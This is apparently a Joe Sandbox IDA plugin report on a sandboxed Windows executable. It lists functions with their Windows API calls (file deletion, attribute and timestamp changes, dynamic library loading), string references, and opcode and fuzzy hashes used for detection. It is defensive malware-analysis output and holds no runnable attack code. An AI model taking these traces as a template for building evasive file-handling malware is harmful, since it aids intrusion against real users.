Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: a0fa365660526cfbb9cae47ffd537a5a3e67cffdb1018a760807b9850e2f108c
Instruction ID: c5e24743f6b433bb21cc94cc2971fe47eb8403274bd7f90fdb54931116458873
Opcode Fuzzy Hash: a0fa365660526cfbb9cae47ffd537a5a3e67cffdb1018a760807b9850e2f108c
Instruction Fuzzy Hash: 7EE0EC75241208FBCB01CF90CD01FCE7BB9EB49754F208058E90596160D375AA14EB54

Function 0040551A Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: a5f15e60ddec85d8ac06024adb1482cc35c18756887bd61c03bc9ed0d5cb4483
Instruction ID: 986561ebb0227da743eeb2b9ec995cdcc659c9848a972ac8d271436d9e92df52
Opcode Fuzzy Hash: a5f15e60ddec85d8ac06024adb1482cc35c18756887bd61c03bc9ed0d5cb4483
Instruction Fuzzy Hash: 6BD0123150452166CF745E3C7C459C333D99A123B03660BAAF4B4D32E5D3748CC35AD4

Function 00405A63 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000,?,00405A2C,?,00000000,00000003,?,00000000,?,00000000), ref: 00405A6E

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 762bf37c8decbf6063af4facc99c374a5abed3ea2b8a5978318a093aad6de801
Instruction ID: 8a38a6d9813b312501c47e0c29c9a2f8cf12ac5fa7676fc4773f80372e0f1af5
Opcode Fuzzy Hash: 762bf37c8decbf6063af4facc99c374a5abed3ea2b8a5978318a093aad6de801
Instruction Fuzzy Hash: 5CD0C93160462146CA645E3C7C849D737D89A16330325176AF0B5D22E4D3748D875E94

Function 00404BDC Relevance: 1.5, APIs: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040489C: SetFileAttributesA.KERNELBASE(?,00000000,00404D1C,?,00000000,0000002A,0000005C,00000003,?,00000000), ref: 0040489E

DeleteFileA.KERNELBASE(?,?,00404DBF,?,00000000,?,?,?,?,?,00000000), ref: 00404BED

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: File$AttributesDelete
String ID:
API String ID: 2910425767-0
Opcode ID: aaa2e24e3cadb2417611b806b2e2b1e55713074da21130e803bc74bd8fb11f06
Instruction ID: 9a45e8f854b003a178289988cc7fc064ae5902da4cc88310474d582750e90668
Opcode Fuzzy Hash: aaa2e24e3cadb2417611b806b2e2b1e55713074da21130e803bc74bd8fb11f06
Instruction Fuzzy Hash: 0BC08C26209231439A043ABA3805ACB171E0EC122030AC0BBB800A2059CB288DC221DC

Function 00405C5A Relevance: 1.5, APIs: 1, Instructions: 9timeCOMMON

Download Yara Rule

APIs

SetFileTime.KERNELBASE(?,?,?,?,00405C84,00000000,00000000,?,00402E12,?), ref: 00405C68

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: FileTime
String ID:
API String ID: 1425588814-0
Opcode ID: c611d48c496a84d7274e6d5b9c1e90c61bae575044892d23a6eff34163934cc8
Instruction ID: 87fe90df0bd66b56430cb58ce5188ab21e49bedd0782b4bf3c7b48ca6ef22eff
Opcode Fuzzy Hash: c611d48c496a84d7274e6d5b9c1e90c61bae575044892d23a6eff34163934cc8
Instruction Fuzzy Hash: 8EC04C36158105FF8F020F70CC04C5EBFA2EB99711F10C918B269C40B0C7328024EB02

Function 0040489C Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNELBASE(?,00000000,00404D1C,?,00000000,0000002A,0000005C,00000003,?,00000000), ref: 0040489E

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 9ef3a3077910c683e57a22045a29601e29b9581d2df390f15cf492c25b36c35e
Instruction ID: c0231da6564a4fbd22ddd4f059f5cfeb57e5ba4ab4dd36146b68eeddd1056acd
Opcode Fuzzy Hash: 9ef3a3077910c683e57a22045a29601e29b9581d2df390f15cf492c25b36c35e
Instruction Fuzzy Hash: 5BA002A03112059BA6145B315E0AB6F296DEDC9AE1705C56C7412C5060EB29C9505565

Function 0040498D Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNELBASE(?,00000000,00405228,?,?,?,?,00000003,?,00000000,?,00000000), ref: 00404990

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: b19b64997772cde21bab08b79878e27a599263e6d5f620d435ec54b846f4109b
Instruction ID: 18df801fa9cda183c38834b8287032c54ef98b8f5de1dc60049a64e9909c76fe
Opcode Fuzzy Hash: b19b64997772cde21bab08b79878e27a599263e6d5f620d435ec54b846f4109b
Instruction Fuzzy Hash: DCA0223030030283E2200F320E0AB0F280CAF08AC0F00C02C3000C80E0FB28C000008C

Function 004070AC Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 004070DD

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: CriticalLeaveSection
String ID:
API String ID: 3988221542-0
Opcode ID: f2ff9836336f67d9ff12deaf62cc92e2eac5b33916cf9d308384194b51d8e0a8
Instruction ID: e1c64c6d5edf12e6328a1e744b201271d318d100f8e499d88b0975d8390c0fb0
Opcode Fuzzy Hash: f2ff9836336f67d9ff12deaf62cc92e2eac5b33916cf9d308384194b51d8e0a8
Instruction Fuzzy Hash: AEF0BE32A041849BCF11DFA0C80898A7F61FF55310B0084ABF905A7251C7359C10DF61

Non-executed Functions

Function 00418320 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,0041795A,?,Microsoft Visual C++ Runtime Library,00012010,?,0041BD2C,?,0041BD7C,?,?,?,Runtime Error!Program: ), ref: 00418332
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0041834A
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0041835B
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00418368

Strings

GetActiveWindow, xrefs: 00418355
GetLastActivePopup, xrefs: 0041835D
user32.dll, xrefs: 0041832D
MessageBoxA, xrefs: 00418344

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
API String ID: 2238633743-4044615076
Opcode ID: 3f0a24d6d85b05054a3dd2e72677b881a91c1b783ec14cf3ede4e9bf1f2578f7
Instruction ID: e87ed1bb16eb8be6f8b96595097180185a60ce52c98033cfd4ddfb8cddd90555
Opcode Fuzzy Hash: 3f0a24d6d85b05054a3dd2e72677b881a91c1b783ec14cf3ede4e9bf1f2578f7
Instruction Fuzzy Hash: C50179713002057F87209FB59C80A9B7AF4EB44B45318003EB558C3251DB6DCFC29BE9

Function 0040E5A5 Relevance: 1.7, APIs: 1, Instructions: 246COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040E5AA

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: b07fb5bf97a2b1aa00d72e408e60a61c646f09191d68c079a122928f862f61c3
Instruction ID: 21f6de2b17b1780f59bfe67bff07a3778763215a5d034522e7ff50d1aecbc74d
Opcode Fuzzy Hash: b07fb5bf97a2b1aa00d72e408e60a61c646f09191d68c079a122928f862f61c3
Instruction Fuzzy Hash: 86A1FA70E002099FCB18DF96C4919AEB7B2FFA4314F14887FE815A7291DB39AD61CB54

Function 0041584A Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00015804), ref: 0041584F

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 606abe9215baac8c82b0634bac82feb5658c8fb73c9735c67e630ff6bf3afee2
Instruction ID: 76677b13eed7a87b3dd700732a0fedcf1c6828d453a24416ba8446ce1f8cc847
Opcode Fuzzy Hash: 606abe9215baac8c82b0634bac82feb5658c8fb73c9735c67e630ff6bf3afee2
Instruction Fuzzy Hash: 6CA022F0280300CF8B00AF20AC082C03E30F28830330000B3B80080238CF380388CA2C

Function 0041585C Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00415861

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 1d24ef28bc6494d4f32e17e582550bcecd4607126de7dd0e3447cde8bb60405a
Instruction ID: 9f5714f3741d262582d91aa49c58cb07bd20065c27159592644951a243d3f8b5
Opcode Fuzzy Hash: 1d24ef28bc6494d4f32e17e582550bcecd4607126de7dd0e3447cde8bb60405a
Instruction Fuzzy Hash:

Function 004126B0 Relevance: .5, Instructions: 481COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27156ca4970ad7a14cafdd4d0f561c0251ce2efe8b7cb58f4bb8e0a1a151ff8a
Instruction ID: 16771a17edc265a66ec67cf10f30b53a928448ec08439b5136306a35d4d76ba5
Opcode Fuzzy Hash: 27156ca4970ad7a14cafdd4d0f561c0251ce2efe8b7cb58f4bb8e0a1a151ff8a
Instruction Fuzzy Hash: 3D023C72A042114BD719CE18C6802BDBBE2FBD5350F150A3FE4A6D7684D7B898E8C799

Function 004162A6 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
Instruction ID: ff32ffadf5a964956f90e5d4d875ac86f6d3b74cc38b5144254d495ff0ae7514
Opcode Fuzzy Hash: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
Instruction Fuzzy Hash: D3B18E75A0020ADFDB15CF04C5D0AE9BBA2BF58318F25C19EC85A4B346C735EE82CB94

Function 00403A01 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 951ce894d9222124d4953917d4d44c2f3af61f07f2abcd4f63f3fcd2ee4f65ae
Instruction ID: b54c2cd6cfa36051406bb29028bc26d5c271240bfac9ba2f52dccebc7510b76a
Opcode Fuzzy Hash: 951ce894d9222124d4953917d4d44c2f3af61f07f2abcd4f63f3fcd2ee4f65ae
Instruction Fuzzy Hash: 52214F3E370D0607A71C8B69AD336B921D2E38430A7C8A03DE68BC53D1EE6CD595860D

Function 00418EF1 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
Instruction ID: d8f843b74cbd450328ce6fa4395b1e87caa1541ea2f4e00bece6a97874f35350
Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
Instruction Fuzzy Hash: 9F21D7329046254BCB42DE6EE4845A7F392FBC437AF23472BED8467290C638E855D6A0

Function 00418FCB Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
Instruction ID: adcd1020660a0caec7aa531f2501062eb824b7187074cdff0887c6cd02d8138b
Opcode Fuzzy Hash: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
Instruction Fuzzy Hash: EF21377291442587C701DF1DE4986B7B7E1FFC8319F678B2BD9818B180CA39DC81D690

Function 00417836 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 100fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 004178A3
GetStdHandle.KERNEL32(000000F4,0041BD2C,00000000,00000000,00000000,?), ref: 00417979
WriteFile.KERNEL32(00000000), ref: 00417980

Strings

*B, xrefs: 00417851
Runtime Error!Program: , xrefs: 00417909
<program name unknown>, xrefs: 004178B3
Microsoft Visual C++ Runtime Library, xrefs: 0041794F
X*B, xrefs: 00417844
..., xrefs: 004178F5

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: File$HandleModuleNameWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $X*B$*B
API String ID: 3784150691-2787626558
Opcode ID: a5ae5b659794e102b2e8aa4557315333f416c08d847f0ab12ced78ba572f4f7a
Instruction ID: 83e6cc08efc147308ddc610541e3e7ace00831554afff49654370310fabd765f
Opcode Fuzzy Hash: a5ae5b659794e102b2e8aa4557315333f416c08d847f0ab12ced78ba572f4f7a
Instruction Fuzzy Hash: 6E310472A00218AFEF20E660DD45FDA737DEB45344F5000ABF544D6140EBBCAAC58BAD

Function 0041881D Relevance: 13.7, APIs: 9, Instructions: 177COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000100,0041BDF8,00000001,00000000,00000000,74DEE860,004256C4,?,?,?,004186BE,?,?,?,00000000), ref: 0041885F
LCMapStringA.KERNEL32(00000000,00000100,0041BDF4,00000001,00000000,00000000,?,?,004186BE,?,?,?,00000000,00000001), ref: 0041887B
LCMapStringA.KERNEL32(?,?,?,004186BE,?,?,74DEE860,004256C4,?,?,?,004186BE,?,?,?,00000000), ref: 004188C4
MultiByteToWideChar.KERNEL32(?,004256C5,?,004186BE,00000000,00000000,74DEE860,004256C4,?,?,?,004186BE,?,?,?,00000000), ref: 004188FC
MultiByteToWideChar.KERNEL32(00000000,00000001,?,004186BE,?,00000000,?,?,004186BE,?), ref: 00418954
LCMapStringW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,004186BE,?), ref: 0041896A
LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?,004186BE,?), ref: 0041899D
LCMapStringW.KERNEL32(?,?,?,?,?,00000000,?,?,004186BE,?), ref: 00418A05

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
